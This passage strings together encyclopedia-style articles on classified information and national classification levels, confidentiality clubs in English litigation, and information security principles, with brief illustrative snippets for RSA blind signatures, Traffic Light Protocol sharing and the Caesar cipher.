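assert pow(s, e, n) == m                   # ordinary RSA verification passes
print("unlinkable signature verified")
```

The privacy property is that the signer sees only the blinded value, so when the certificate is later spent, the signature cannot be matched to the withdrawal, which is the cryptographic analogue of the account-holder anonymity discussed above.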
https://en.wikipedia.org/wiki/Bank_secrecy
Classified information is confidential material that a government deems to be sensitive information, which must be protected from unauthorized disclosure and requires special handling and dissemination controls. Access is restricted by law or regulation to particular groups of individuals with the necessary security clearance and a need to know. A formal security clearance is required to view or handle classified material, and the clearance process requires a satisfactory background investigation. Documents and other information must be properly marked by the author with one of several (hierarchical) levels of sensitivity, e.g. Confidential (C), Secret (S), and Top Secret (TS). All classified documents require designation markings on the technical file, usually located on the cover sheet or in the header and footer of each page.

The choice of level is based on an impact assessment; governments have their own criteria, including how to determine the classification of an information asset and rules on how to protect information classified at each level. This process often includes security clearances for personnel handling the information. Mishandling of the material can incur criminal penalties.

Some corporations and non-government organizations also assign levels of protection to their private information, either from a desire to protect trade secrets, or because of laws and regulations governing various matters such as personal privacy, sealed legal proceedings and the timing of financial information releases.

With the passage of time, much classified information becomes less sensitive and may be declassified and made public. Since the late twentieth century there has been freedom of information legislation in some countries, whereby the public is deemed to have the right to all information that is not considered to be damaging if released. Sometimes documents are released with information still considered confidential obscured (redacted).

Some political science and legal experts question whether the definition of classified ought to be information that would cause injury to the cause of justice, human rights, etc., rather than information that would cause injury to the national interest; that is, to distinguish when classifying information is in the collective best interest of a just society, or merely in the best interest of a society acting unjustly to protect its people, government, or administrative officials from legitimate recourse consistent with a fair and just social contract.

The purpose of classification is to protect information. Higher classifications protect information that might endanger national security. Classification formalises what constitutes a "state secret" and accords different levels of protection based on the expected damage the information might cause in the wrong hands. However, classified information is frequently "leaked" to reporters by officials for political purposes. Several U.S. presidents have leaked sensitive information to influence public opinion.[2][3] Former government intelligence officials are usually able to retain their security clearance, but it is a privilege, not a right, with the President being the grantor.[4]

Although classification systems vary from country to country, most have levels corresponding to the following British definitions (from the highest level to lowest).
Top Secret is the highest level of classified information.[5] Information is further compartmented, so that specific access using a code word after "top secret" is a legal way to hide collective and important information.[6] Such material would cause "exceptionally grave damage" to national security if made publicly available.[7] Prior to 1942, the United Kingdom and other members of the British Empire used "Most Secret", but this was later changed to match the United States' category name of Top Secret in order to simplify Allied interoperability. The unauthorized disclosure of Top Secret (TS) information is expected to cause grave harm to national security. The Washington Post reported in an investigation entitled "Top Secret America" that, as of 2010, "An estimated 854,000 people ... hold top-secret security clearances" in the United States.[8]

"It is desired that no document be released which refers to experiments with humans and might have adverse effect on public opinion or result in legal suits. Documents covering such work field should be classified 'secret'."

Secret material would cause "serious damage" to national security if it were publicly available.[11] In the United States, operational "Secret" information can be marked with an additional "LimDis", to limit distribution.

Confidential material would cause "damage" or be prejudicial to national security if publicly available.[12]

Restricted material would cause "undesirable effects" if publicly available. Some countries do not have such a classification in public sectors, such as commercial industries. Such a level is also known as "Private Information".

Official (equivalent to the U.S. DOD classification Controlled Unclassified Information, or CUI) material forms the generality of government business, public service delivery and commercial activity. This includes a diverse range of information, of varying sensitivities, and with differing consequences resulting from compromise or loss. Official information must be secured against a threat model that is broadly similar to that faced by a large private company. The Official Sensitive classification replaced the Restricted classification in April 2014 in the UK; Official covers what was previously the Unclassified marking.[13]

Unclassified is technically not a classification level, though it is a feature of some classification schemes, used for government documents that do not merit a particular classification or that have been declassified. This is because the information is low-impact and therefore does not require any special protection, such as vetting of personnel. A plethora of pseudo-classifications exist under this category.[citation needed]

Clearance is a general classification comprising a variety of rules controlling the level of permission required to view classified information, and how such information must be stored, transmitted, and destroyed. Additionally, access is restricted on a "need to know" basis. Simply possessing a clearance does not automatically authorize the individual to view all material classified at or below that level; the individual must present a legitimate "need to know" in addition to the proper level of clearance.

In addition to the general risk-based classification levels, additional compartmented constraints on access exist, such as (in the U.S.) Special Intelligence (SI), which protects intelligence sources and methods, No Foreign dissemination (NoForn), which restricts dissemination to U.S.
nationals, and Originator Controlled dissemination (OrCon), which ensures that the originator can track possessors of the information. Information in these compartments is usually marked with specific keywords in addition to the classification level. Government information about nuclear weapons often has an additional marking to show it contains such information (CNWDI).

When a government agency or group shares information with an agency or group of another country's government, they will generally employ a special classification scheme that both parties have previously agreed to honour. For example, the marking Atomal is applied to U.S. Restricted Data or Formerly Restricted Data and United Kingdom atomic information that has been released to NATO. Atomal information is marked COSMIC Top Secret Atomal (CTSA), NATO Secret Atomal (NSAT), or NATO Confidential Atomal (NCA). BALK and BOHEMIA are also used. For example, sensitive information shared amongst NATO allies has four levels of security classification, from most to least classified.[14][15] A special case exists with regard to NATO Unclassified (NU) information: documents with this marking are NATO property (copyright) and must not be made public without NATO permission. COSMIC is an acronym for "Control of Secret Material in an International Command".[17]

Most countries employ some sort of classification system for certain government information. For example, in Canada, information that the U.S. would classify SBU (Sensitive but Unclassified) is called "protected" and further subcategorised into levels A, B, and C.

On 19 July 2011, the National Security (NS) classification marking scheme and the Non-National Security (NNS) classification marking scheme in Australia were unified into one structure. As of 2018, the policy detailing how Australian government entities handle classified information is defined in the Protective Security Policy Framework (PSPF). The PSPF is published by the Attorney-General's Department and covers security governance, information security, personnel security, and physical security. A security classification can be applied to the information itself or to an asset that holds information, e.g. a USB drive or laptop.[23]

The Australian Government uses four security classifications: OFFICIAL: Sensitive, PROTECTED, SECRET and TOP SECRET. The relevant security classification is based on the likely damage resulting from compromise of the information's confidentiality. All other information from business operations and services requires a routine level of protection and is treated as OFFICIAL. Information that does not form part of official duty is treated as UNOFFICIAL. OFFICIAL and UNOFFICIAL are not security classifications and are not mandatory markings.

Caveats are a warning that the information has special protections in addition to those indicated by the security classification of PROTECTED or higher (or, in the case of the NATIONAL CABINET caveat, OFFICIAL: Sensitive or higher). Australia has four caveats: Codewords are primarily used within the national security community; each codeword identifies a special need-to-know compartment. Foreign government markings are applied to information created by Australian agencies from foreign source information, and require protection at least equivalent to that required by the foreign government providing the source information. Special handling instructions are used to indicate particular precautions for information handling.
They include:

A releasability caveat restricts information based on citizenship. The three in use are:

Additionally, the PSPF outlines Information Management Markers (IMM) as a way for entities to identify information that is subject to non-security-related restrictions on access and use. These are:

There are three levels of document classification under Brazilian Law No. 12.527, the Access to Information Act:[24] ultrassecreto (top secret), secreto (secret) and reservado (restricted). A top secret (ultrassecreto) government-issued document may be classified for a period of 25 years, which may be extended by up to another 25 years.[25] Thus, no document remains classified for more than 50 years. This is mandated by the 2011 Information Access Law (Lei de Acesso à Informação), a change from the previous rule, under which documents could have their classification renewed indefinitely, effectively shuttering state secrets from the public. The 2011 law applies retroactively to existing documents.

The government of Canada employs two main types of sensitive information designation: Classified and Protected. The access and protection of both types of information is governed by the Security of Information Act, effective 24 December 2001, which replaced the Official Secrets Act 1981.[26] To access the information, a person must have the appropriate security clearance and the need to know. In addition, the caveat "Canadian Eyes Only" is used to restrict access to Classified or Protected information only to Canadian citizens with the appropriate security clearance and need to know.[27]

Special Operational Information (SOI) is not a classification of data per se. It is defined under the Security of Information Act, and unauthorised release of such information constitutes a higher breach of trust, with a penalty of up to life imprisonment if the information is shared with a foreign entity or terrorist group. SOIs include:

In February 2025, the Department of National Defence announced a new category of Persons Permanently Bound to Security (PPBS). The protection applies to some units, sections or elements, and select positions (both current and former), with access to sensitive SOI for national defence and intelligence work. If a unit or organization routinely handles SOI, all members of that unit are automatically bound to secrecy. If an individual has direct access to SOI deemed integral to national security, that person may be recommended for PPBS designation. The designation is for life, and breaches are punishable by imprisonment.[28]

Classified information can be designated Top Secret, Secret or Confidential. These classifications are used only on matters of national interest. Protected information is not classified; it pertains to any sensitive information that does not relate to national security and cannot be disclosed under the access and privacy legislation because of the potential injury to particular public or private interests.[29][30] Federal Cabinet (King's Privy Council for Canada) papers are either protected (e.g., overhead slides prepared for presentations to Cabinet) or classified (e.g., draft legislation, certain memos).[31]

The Criminal Law of the People's Republic of China (which is not operative in the special administrative regions of Hong Kong and Macau) makes it a crime to release a state secret. Regulation and enforcement are carried out by the National Administration for the Protection of State Secrets.
Under the 1989 "Law on Guarding State Secrets",[32] state secrets are defined as those that concern: Secrets can be classified into three categories:

In France, classified information is defined by article 413-9 of the Penal Code.[34] The three levels of military classification are

Less sensitive information is "protected". The levels are

A further caveat, spécial France (reserved for France), restricts the document to French citizens (in its entirety or by extracts); this is not a classification level. Declassification of documents can be done by the Commission consultative du secret de la défense nationale (CCSDN), an independent authority. Transfer of classified information is done with double envelopes, the outer layer being plasticised and numbered, and the inner made of strong paper. Reception of the document involves examination of the physical integrity of the container and registration of the document. In foreign countries, the document must be transferred through specialised military mail or diplomatic bag. Transport is done by an authorised conveyor or habilitated person, for mail under 20 kg. The letter must bear a seal mentioning "Par Valise Accompagnée-Sacoche". Once a year, ministers inventory the classified information and media held by the competent authorities. Once their usage period has expired, documents are transferred to archives, where they are either destroyed (by incineration, crushing, or overvoltage) or stored.

In case of unauthorized release of classified information, the competent authorities are the Ministry of the Interior, the Haut fonctionnaire de défense et de sécurité ("high civil servant for defence and security") of the relevant ministry, and the General Secretariat for National Defence. Violation of such secrets is an offence punishable by seven years of imprisonment and a 100,000-euro fine; if the offence is committed through imprudence or negligence, the penalties are three years of imprisonment and a 45,000-euro fine.

The Security Bureau is responsible for developing policies regarding the protection and handling of confidential government information. In general, the system used in Hong Kong is very similar to the UK system, developed from the colonial era of Hong Kong. Four classifications exist in Hong Kong, from highest to lowest sensitivity:[35] Restricted documents are not classified per se, but only those who have a need to know will have access to such information, in accordance with the Personal Data (Privacy) Ordinance.[36]

New Zealand uses the Restricted classification, which is lower than Confidential. People may be given access to Restricted information on the strength of an authorisation by their head of department, without being subjected to the background vetting associated with Confidential, Secret and Top Secret clearances. New Zealand's security classifications and the national-harm requirements associated with their use are roughly similar to those of the United States. In addition to national security classifications, there are two additional security classifications, In Confidence and Sensitive, which are used to protect information of a policy and privacy nature. There are also a number of information markings used within ministries and departments of the government to indicate, for example, that information should not be released outside the originating ministry. Because of strict privacy requirements around personal information, personnel files are controlled in all parts of the public and private sectors.
Information relating to the security vetting of an individual is usually classified at the In Confidence level.

In Romania, classified information is referred to as "state secrets" (secrete de stat) and is defined by the Penal Code as "documents and data that manifestly appear to have this status or have been declared or qualified as such by decision of Government".[37] There are three levels of classification: Secret (Secret/S), Top Secret (Strict Secret/SS), and Top Secret of Particular Importance (Strict secret de interes deosebit/SSID).[38] The levels are set by the Romanian Intelligence Service and must be aligned with NATO regulations; in case of conflicting regulations, the latter are applied with priority. Dissemination of classified information to foreign agents or powers is punishable by up to life imprisonment if such dissemination threatens Romania's national security.[39]

In the Russian Federation, a state secret (Государственная тайна) is information protected by the state concerning its military, foreign policy, economic, intelligence, counterintelligence, operational, investigative and other activities, dissemination of which could harm state security.

The Swedish classification has been updated due to increased NATO/PfP cooperation. All classified defence documents now have both a Swedish classification (Kvalificerat hemlig, Hemlig, Konfidentiell or Begränsat Hemlig) and an English classification (Top Secret, Secret, Confidential, or Restricted).[citation needed] The term skyddad identitet, "protected identity", is used in the case of protection of a threatened person, basically implying a "secret identity" accessible only to certain members of the police force and explicitly authorised officials.

At the federal level, classified information in Switzerland is assigned one of three levels, from lowest to highest: Internal, Confidential, Secret.[40] Respectively, these are, in German, Intern, Vertraulich, Geheim; in French, Interne, Confidentiel, Secret; in Italian, Ad Uso Interno, Confidenziale, Segreto. As in other countries, the choice of classification depends on the potential impact that unauthorised release of the classified document would have on Switzerland, the federal authorities or the authorities of a foreign government. According to the Ordinance on the Protection of Federal Information, information is classified as Internal if its "disclosure to unauthorised persons may be disadvantageous to national interests".[40] Information classified as Confidential could, if disclosed, compromise "the free formation of opinions and decision-making of the Federal Assembly or the Federal Council", jeopardise national monetary/economic policy, put the population at risk or adversely affect the operations of the Swiss Armed Forces. Finally, the unauthorised release of Secret information could seriously compromise the ability of either the Federal Assembly or the Federal Council to function, or impede the ability of the Federal Government or the Armed Forces to act.

According to the related regulations in Turkey, there are four levels of document classification:[41] çok gizli (top secret), gizli (secret), özel (confidential) and hizmete özel (restricted). A fifth marking, tasnif dışı, means unclassified.

Until 2013, the United Kingdom used five levels of classification; from lowest to highest, they were: Protect, Restricted, Confidential, Secret and Top Secret (formerly Most Secret).
The Cabinet Office provides guidance on how to protect information, including the security clearances required for personnel. Staff may be required to sign to confirm their understanding and acceptance of the Official Secrets Acts 1911 to 1989, although the Acts apply regardless of signature. Protect is not in itself a security protective marking level (such as Restricted or greater), but is used to indicate information which should not be disclosed because, for instance, the document contains tax, national insurance, or other personal information. Government documents without a classification may be marked as Unclassified or Not Protectively Marked.[42]

This system was replaced from April 2014 by the Government Security Classifications Policy, which has a simpler model: Top Secret, Secret, and Official.[13] Official Sensitive is a security marking which may be followed by one of three authorised descriptors: Commercial, LocSen (location sensitive) or Personal. Secret and Top Secret may include a caveat such as UK Eyes Only.

Scientific discoveries may also be classified via the D-Notice system if they are deemed to have applications relevant to national security. These may later emerge as technology improves; for example, the specialised processors and routing engines used in graphics cards are loosely based on top-secret military chips designed for code breaking and image processing. They may or may not have safeguards built in to generate errors when specific tasks are attempted, and this is invariably independent of the card's operating system.[citation needed]

The U.S. classification system is currently established under Executive Order 13526 and has three levels of classification: Confidential, Secret, and Top Secret. The U.S. had a Restricted level during World War II but no longer does; U.S. regulations state that information received from other countries at the Restricted level should be handled as Confidential. A variety of markings are used for material that is not classified but whose distribution is limited administratively or by other laws, e.g., For Official Use Only (FOUO) or Sensitive But Unclassified (SBU).

The Atomic Energy Act of 1954 provides for the protection of information related to the design of nuclear weapons. The term "Restricted Data" is used to denote certain nuclear technology. Information about the storage, use or handling of nuclear material or weapons is marked "Formerly Restricted Data". These designations are used in addition to level markings (Confidential, Secret and Top Secret). Information protected by the Atomic Energy Act is protected by law, and information classified under the Executive Order is protected by executive privilege.

The U.S. government insists it is "not appropriate" for a court to question whether any document is legally classified.[43] In the 1973 trial of Daniel Ellsberg for releasing the Pentagon Papers, the judge did not allow any testimony from Ellsberg, claiming it was "irrelevant", because the assigned classification could not be challenged. The charges against Ellsberg were ultimately dismissed after it was revealed that the government had broken the law by secretly breaking into the office of Ellsberg's psychiatrist and tapping his telephone without a warrant. Ellsberg insists that the legal situation in the U.S.
in 2014 is worse than it was in 1973, and that Edward Snowden could not get a fair trial.[44] The State Secrets Protection Act of 2008 might have given judges the authority to review such questions in camera, but the bill was not passed.[43] When a government agency acquires classified information through covert means, or designates a program as classified, the agency asserts "ownership" of that information and considers any public availability of it to be a violation of its ownership, even if the same information was acquired independently through "parallel reporting" by the press or others. For example, although the CIA drone program has been widely discussed in public since the early 2000s, and reporters have personally observed and reported on drone missile strikes, the CIA still considers the very existence of the program to be classified in its entirety, and any public discussion of it technically constitutes exposure of classified information. "Parallel reporting" was an issue in determining what constitutes "classified" information during the Hillary Clinton email controversy, when Assistant Secretary of State for Legislative Affairs Julia Frifield noted, "When policy officials obtain information from open sources, 'think tanks,' experts, foreign government officials, or others, the fact that some of the information may also have been available through intelligence channels does not mean that the information is necessarily classified."[45][46][47] [A comparison table of national classification markings and their approximate English equivalents (Top Secret, Secret, Confidential, Restricted) appeared here but was flattened during extraction and most country labels were lost. Among the recoverable rows are the Philippines (Tagalog) markings Matinding Lihim, Mahigpit na Lihim, Lihim, and Ipinagbabawal, and the note that US, French, EU, and Japanese "Confidential" markings are to be handled as SECRET.[49] Table source: US Department of Defense (January 1995), "National Industrial Security Program - Operating Manual (DoD 5220.22-M)", pp. B1-B3 (PDF pages 121-123), archived 27 July 2019, retrieved 27 July 2019.] Private corporations often require written confidentiality agreements and conduct background checks on candidates for sensitive positions.[53] In the U.S., the Employee Polygraph Protection Act prohibits private employers from requiring lie detector tests, but there are a few exceptions. Policies dictating methods for marking and safeguarding company-sensitive information (e.g. "IBM Confidential") are common, and some companies have more than one level. Such information is protected under trade secret laws. New product development teams are often sequestered and forbidden to share information about their efforts with un-cleared fellow employees, the original Apple Macintosh project being a famous example. Other activities, such as mergers and financial report preparation, generally involve similar restrictions.
However, corporate security generally lacks the elaborate hierarchical clearance and sensitivity structures and the harsh criminal sanctions that give government classification systems their particular tone. The Traffic Light Protocol[54][55] was developed by the Group of Eight countries to enable the sharing of sensitive information between government agencies and corporations. This protocol has since been accepted as a model for trusted information exchange by over 30 other countries. The protocol provides four "information sharing levels" for the handling of sensitive information.
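The four levels are conventionally colour-coded; in the version published by FIRST they are TLP:RED, TLP:AMBER, TLP:GREEN, and TLP:WHITE (renamed TLP:CLEAR in TLP 2.0). The sketch below is a minimal illustration of how a sharing tool might gate redistribution on these markings; the audience categories and the may_forward logic are assumptions for the example, not part of the protocol text:

```python
from enum import IntEnum

class TLP(IntEnum):
    """Traffic Light Protocol markings, most to least restrictive."""
    RED = 3    # for the named recipients only
    AMBER = 2  # limited sharing within recipients' organisations
    GREEN = 1  # sharing within the wider community, but not publicly
    WHITE = 0  # unlimited disclosure (renamed TLP:CLEAR in TLP 2.0)

# Illustrative sharing rule: which audiences each marking permits.
# The audience category names are invented for this sketch.
AUDIENCES = {
    TLP.RED: set(),
    TLP.AMBER: {"own_organisation"},
    TLP.GREEN: {"own_organisation", "community"},
    TLP.WHITE: {"own_organisation", "community", "public"},
}

def may_forward(marking: TLP, audience: str) -> bool:
    """Return True if a document with this marking may be forwarded
    to the given audience category."""
    return audience in AUDIENCES[marking]

assert may_forward(TLP.GREEN, "community")
assert not may_forward(TLP.RED, "own_organisation")
```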
https://en.wikipedia.org/wiki/Classified_information
In English legal proceedings, a confidentiality club (also known as a confidentiality ring)[1] is an agreement occasionally reached by parties to a litigation to reduce the risk of confidential documents being used outside the litigation. The agreement typically provides that only specified persons can access certain documents. Setting up a confidentiality club "requires some degree of cooperation between the parties".[2] Confidentiality rings or clubs were described in 2012 as being increasingly common;[3] the case report on Roche Diagnostics Ltd v Mid Yorkshire Hospitals NHS Trust, a public procurement dispute, also notes that they are "common in cases of this kind", and allow for specific disclosure of documents without causing the "difficulty relating to confidentiality" which would otherwise arise.[4]
https://en.wikipedia.org/wiki/Confidentiality_club
Information security is the practice of protecting information by mitigating information risks. It is part of information risk management.[1] It typically involves preventing or reducing the probability of unauthorized or inappropriate access to data, or the unlawful use, disclosure, disruption, deletion, corruption, modification, inspection, recording, or devaluation of information. It also involves actions intended to reduce the adverse impacts of such incidents. Protected information may take any form, e.g., electronic or physical, tangible (e.g., paperwork) or intangible (e.g., knowledge).[2][3] Information security's primary focus is the balanced protection of data confidentiality, integrity, and availability (also known as the 'CIA' triad)[4][5] while maintaining a focus on efficient policy implementation, all without hampering organization productivity.[6] This is largely achieved through a structured risk management process.[7] To standardize this discipline, academics and professionals collaborate to offer guidance, policies, and industry standards on passwords, antivirus software, firewalls, encryption software, legal liability, security awareness and training, and so forth.[8] This standardization may be further driven by a wide variety of laws and regulations that affect how data is accessed, processed, stored, transferred, and destroyed.[9] While paper-based business operations are still prevalent, requiring their own set of information security practices, enterprise digital initiatives are increasingly being emphasized,[10][11] with information assurance now typically being dealt with by information technology (IT) security specialists. These specialists apply information security to technology (most often some form of computer system). IT security specialists are almost always found in any major enterprise or establishment due to the nature and value of the data within larger businesses.[12] They are responsible for keeping all of the technology within the company secure from malicious attacks that often attempt to acquire critical private information or gain control of internal systems.[13][14] There are many specialist roles in information security, including securing networks and allied infrastructure, securing applications and databases, security testing, information systems auditing, business continuity planning, electronic record discovery, and digital forensics.[15] Information security standards are techniques generally outlined in published materials that attempt to protect the information of a user or organization.[16] This environment includes users themselves, networks, devices, all software, processes, information in storage or transit, applications, services, and systems that can be connected directly or indirectly to networks. The principal objective is to reduce risk, including preventing or mitigating attacks. These published materials consist of tools, policies, security concepts, security safeguards, guidelines, risk management approaches, actions, training, best practices, assurance, and technologies. Information security threats come in many different forms.[27] Some of the most common threats today are software attacks, theft of intellectual property, theft of identity, theft of equipment or information, sabotage, and information extortion.[28][29] Viruses,[30] worms, phishing attacks, and Trojan horses are a few common examples of software attacks.
The theft of intellectual property has also been an extensive issue for many businesses.[31] Identity theft is the attempt to act as someone else, usually to obtain that person's personal information or to take advantage of their access to vital information through social engineering.[32][33] Sabotage usually consists of the destruction of an organization's website in an attempt to cause loss of confidence on the part of its customers.[34] Information extortion consists of theft of a company's property or information as an attempt to receive a payment in exchange for returning the information or property to its owner, as with ransomware.[35] One of the most effective precautions against these attacks is to conduct periodic user awareness training.[36] Governments, military, corporations, financial institutions, hospitals, non-profit organizations, and private businesses amass a great deal of confidential information about their employees, customers, products, research, and financial status.[37] Should confidential information about a business's customers, finances, or new product line fall into the hands of a competitor or hacker, the business and its customers could suffer widespread, irreparable financial loss, as well as damage to the company's reputation.[38] From a business perspective, information security must be balanced against cost; the Gordon-Loeb Model provides a mathematical economic approach for addressing this concern.[39] For the individual, information security has a significant effect on privacy, which is viewed very differently in various cultures.[40] Since the early days of communication, diplomats and military commanders understood that it was necessary to provide some mechanism to protect the confidentiality of correspondence and to have some means of detecting tampering.[41] Julius Caesar is credited with the invention of the Caesar cipher c. 50 B.C., which was created in order to prevent his secret messages from being read should a message fall into the wrong hands.[42] However, for the most part protection was achieved through the application of procedural handling controls.[43][44] Sensitive information was marked up to indicate that it should be protected and transported by trusted persons, and guarded and stored in a secure environment or strongbox.[45] As postal services expanded, governments created official organizations to intercept, decipher, read, and reseal letters (e.g., the U.K.'s Secret Office, founded in 1653[46]).
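Returning to the Caesar cipher mentioned above: by modern standards such a substitution cipher offers essentially no protection, and it can be implemented, and exhaustively broken, in a few lines. The sketch below is purely illustrative, not a description of any historical implementation:

```python
def caesar(text: str, shift: int) -> str:
    """Shift each letter by `shift` positions, preserving case;
    non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return ''.join(out)

ciphertext = caesar("Attack at dawn", 3)      # 'Dwwdfn dw gdzq'
assert caesar(ciphertext, -3) == "Attack at dawn"
# A brute-force "attack" needs only 25 candidate shifts to inspect.
candidates = [caesar(ciphertext, -k) for k in range(1, 26)]
```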
In the mid-nineteenth century more complex classification systems were developed to allow governments to manage their information according to its degree of sensitivity.[47] For example, the British Government codified this, to some extent, with the publication of the Official Secrets Act in 1889.[48] Section 1 of the law concerned espionage and unlawful disclosures of information, while Section 2 dealt with breaches of official trust.[49] A public interest defense was soon added to defend disclosures in the interest of the state.[50] A similar law was passed in India in 1889, the Indian Official Secrets Act, which was associated with the British colonial era and used to crack down on newspapers that opposed the Raj's policies.[51] A newer version, passed in 1923, extended to all matters of confidential or secret information for governance.[52] By the time of the First World War, multi-tier classification systems were used to communicate information to and from various fronts, which encouraged greater use of code-making and code-breaking sections in diplomatic and military headquarters.[53] Encoding became more sophisticated between the wars as machines were employed to scramble and unscramble information.[54] The history of information security begins with the establishment of computer security, the need for which emerged during World War II.[55] The volume of information shared by the Allied countries during the Second World War necessitated formal alignment of classification systems and procedural controls.[56] An arcane range of markings evolved to indicate who could handle documents (usually officers rather than enlisted troops) and where they should be stored as increasingly complex safes and storage facilities were developed.[57] The Enigma Machine, which was employed by the Germans to encrypt wartime communications and which was successfully decrypted by Alan Turing, can be regarded as a striking example of creating and using secured information.[58] Procedures evolved to ensure documents were destroyed properly, and it was the failure to follow these procedures that led to some of the greatest intelligence coups of the war (e.g., the capture of U-570[58]). Various mainframe computers were connected online during the Cold War to complete more sophisticated tasks, in a communication process easier than mailing magnetic tapes back and forth between computer centers. As such, the Advanced Research Projects Agency (ARPA) of the United States Department of Defense started researching the feasibility of a networked system of communication to trade information within the United States Armed Forces. In 1968, the ARPANET project was formulated by Larry Roberts; it would later evolve into what is known as the internet.[59] In 1973, internet pioneer Robert Metcalfe found that important elements of ARPANET security had many flaws, such as the "vulnerability of password structure and formats; lack of safety procedures for dial-up connections; and nonexistent user identification and authorizations", aside from the lack of controls and safeguards to keep data safe from unauthorized access.
Hackers had effortless access to ARPANET, as phone numbers were known to the public.[60] Due to these problems, coupled with constant violations of computer security and the exponential growth in the number of hosts and users of the system, "network security" was often alluded to as "network insecurity".[60] The end of the twentieth century and the early years of the twenty-first century saw rapid advancements in telecommunications, computing hardware and software, and data encryption.[61] The availability of smaller, more powerful, and less expensive computing equipment brought electronic data processing within the reach of small businesses and home users.[62] The establishment of the Transmission Control Protocol/Internet Protocol (TCP/IP) suite in the early 1980s enabled different types of computers to communicate.[63] These computers quickly became interconnected through the internet.[64] The rapid growth and widespread use of electronic data processing and electronic business conducted through the internet, along with numerous occurrences of international terrorism, fueled the need for better methods of protecting the computers and the information they store, process, and transmit.[65] The academic disciplines of computer security and information assurance emerged along with numerous professional organizations, all sharing the common goals of ensuring the security and reliability of information systems.[66] The "CIA triad" of confidentiality, integrity, and availability is at the heart of information security.[67] The concept was introduced in the Anderson Report in 1972 and later repeated in The Protection of Information in Computer Systems. The abbreviation was coined by Steve Lipner around 1986.[68] Debate continues about whether or not this triad is sufficient to address rapidly changing technology and business requirements, with recommendations to consider expanding on the intersections between availability and confidentiality, as well as the relationship between security and privacy.[4] Other principles, such as "accountability", have sometimes been proposed; it has been pointed out that issues such as non-repudiation do not fit well within the three core concepts.[69] In information security, confidentiality "is the property, that information is not made available or disclosed to unauthorized individuals, entities, or processes."[70] While similar to "privacy", the two words are not interchangeable.
Rather, confidentiality is a component of privacy that serves to protect data from unauthorized viewers.[71] Examples of confidentiality of electronic data being compromised include laptop theft, password theft, and sensitive emails being sent to the wrong individuals.[72] In IT security, data integrity means maintaining and assuring the accuracy and completeness of data over its entire lifecycle.[73] This means that data cannot be modified in an unauthorized or undetected manner.[74] This is not the same thing as referential integrity in databases, although it can be viewed as a special case of consistency as understood in the classic ACID model of transaction processing.[75] Information security systems typically incorporate controls to ensure their own integrity, in particular protecting the kernel or core functions against both deliberate and accidental threats.[76] Multi-purpose and multi-user computer systems aim to compartmentalize data and processing such that no user or process can adversely impact another; the controls may not succeed, however, as incidents such as malware infections, hacks, data theft, fraud, and privacy breaches show.[77] More broadly, integrity is an information security principle that involves human/social, process, and commercial integrity, as well as data integrity. As such it touches on aspects such as credibility, consistency, truthfulness, completeness, accuracy, timeliness, and assurance.[78] For any information system to serve its purpose, the information must be available when it is needed.[79] This means the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly.[80] High availability systems aim to remain available at all times, preventing service disruptions due to power outages, hardware failures, and system upgrades.[81] Ensuring availability also involves preventing denial-of-service attacks, such as a flood of incoming messages to the target system, essentially forcing it to shut down.[82] In the realm of information security, availability can often be viewed as one of the most important parts of a successful information security program.[citation needed] Ultimately, end-users need to be able to perform job functions; by ensuring availability, an organization is able to perform to the standards its stakeholders expect.[83] This can involve topics such as proxy configurations, outside web access, the ability to access shared drives, and the ability to send emails.[84] Executives often do not understand the technical side of information security and look at availability as an easy fix, but this often requires collaboration from many different organizational teams, such as network operations, development operations, incident response, and policy/change management.[85] A successful information security team involves many different key roles meshing and aligning for the CIA triad to be provided effectively.[86] In addition to the classic CIA triad of security goals, some organisations may want to include security goals like authenticity, accountability, non-repudiation, and reliability. In law, non-repudiation implies one's intention to fulfill one's obligations under a contract.
It also implies that one party of a transaction cannot deny having received a transaction, nor can the other party deny having sent a transaction.[87] It is important to note that while technology such as cryptographic systems can assist in non-repudiation efforts, the concept is at its core a legal concept transcending the realm of technology.[88] It is not, for instance, sufficient to show that a message matches a digital signature signed with the sender's private key, and thus that only the sender could have sent the message and nobody could have altered it in transit (data integrity).[89] The alleged sender could in return demonstrate that the digital signature algorithm is vulnerable or flawed, or allege or prove that his signing key has been compromised.[90] The fault for these violations may or may not lie with the sender, and such assertions may or may not relieve the sender of liability, but the assertion would invalidate the claim that the signature necessarily proves authenticity and integrity. As such, the sender may repudiate the message (because authenticity and integrity are pre-requisites for non-repudiation).[91] First issued in 1992 and revised in 2002, the OECD's Guidelines for the Security of Information Systems and Networks[92] proposed nine generally accepted principles: awareness, responsibility, response, ethics, democracy, risk assessment, security design and implementation, security management, and reassessment.[93] Building upon those, in 2004 NIST's Engineering Principles for Information Technology Security[69] proposed 33 principles. In 1998, Donn Parker proposed an alternative model for the classic CIA triad that he called the six atomic elements of information: confidentiality, possession, integrity, authenticity, availability, and utility. The merits of the Parkerian Hexad are a subject of debate amongst security professionals.[94] In 2011, The Open Group published the information security management standard O-ISM3.[95] This standard proposed an operational definition of the key concepts of security, with elements called "security objectives", related to access control (9), availability (3), data quality (1), compliance, and technical (4). Risk is the likelihood that something bad will happen that causes harm to an informational asset (or the loss of the asset).[96] A vulnerability is a weakness that could be used to endanger or cause harm to an informational asset. A threat is anything (man-made or act of nature) that has the potential to cause harm.[97] The likelihood that a threat will use a vulnerability to cause harm creates a risk. When a threat does use a vulnerability to inflict harm, it has an impact.[98] In the context of information security, the impact is a loss of availability, integrity, and confidentiality, and possibly other losses (lost income, loss of life, loss of real property).[99] The Certified Information Systems Auditor (CISA) Review Manual 2006 defines risk management as "the process of identifying vulnerabilities and threats to the information resources used by an organization in achieving business objectives, and deciding what countermeasures,[100] if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization."[101] There are two things in this definition that may need some clarification. First, the process of risk management is an ongoing, iterative process; it must be repeated indefinitely.
